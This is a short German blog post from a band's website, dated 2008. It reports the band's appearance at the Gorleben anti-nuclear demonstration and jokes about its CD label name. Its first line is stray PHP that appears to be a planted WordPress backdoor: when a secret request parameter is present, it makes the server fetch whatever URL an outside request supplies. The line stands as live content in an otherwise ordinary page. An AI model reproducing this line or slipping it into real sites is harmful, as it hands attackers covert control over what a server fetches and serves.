isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']); Schroeder Roadshow » gorleben 08 | 2

gorleben 08 | 2

Schroeder am 19. November 2008

Poster im Publikum

Wieso heißt es auf der neuen SCHROEDER CD eigentlich “SCHWERKRAFT - NICHT SCHON WIEDER- Produktion”?
Antwort: Ähnlich dem Auf und Ab in der Diskussion um die Nutzung der Atomkraft und der Entsorgung des anfallenden Atommülls, so befällt uns selbst wellenartig die Problematik der Schwerkraft - besonders bei FREIBIER!
Unsere ersten LPs und CDs erschienen bereits unter dem Label SCHWERKRAFT - NEIN DANKE!, und so war es nur zwingend, dass wir uns der aktuellen taz-Kampagne ATOMKRAFT - NICHT SCHON WIEDER! anschließen. Hat auch geklappt, und natürlich wollten wir 2008 unseren ersten Auftritt nach der Record-Release-Party in Zechow bei der Auftaktkundgebung zur großen ANTI-AKW-Demo 2008 in Gorleben abliefern.

Link zu Bürgerinitiative Lüchow-Dannenberg

Starte eine interaktive Slideshow mit PicLens Lite PicLens
[ FlashPlayer 9 erforderlich ]

Weitere Gorleben Bilder sind hier zu finden: KLICK

Fotos: © Frank

Abgelegt unter Gorleben, Konzert | Keine Kommentare

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben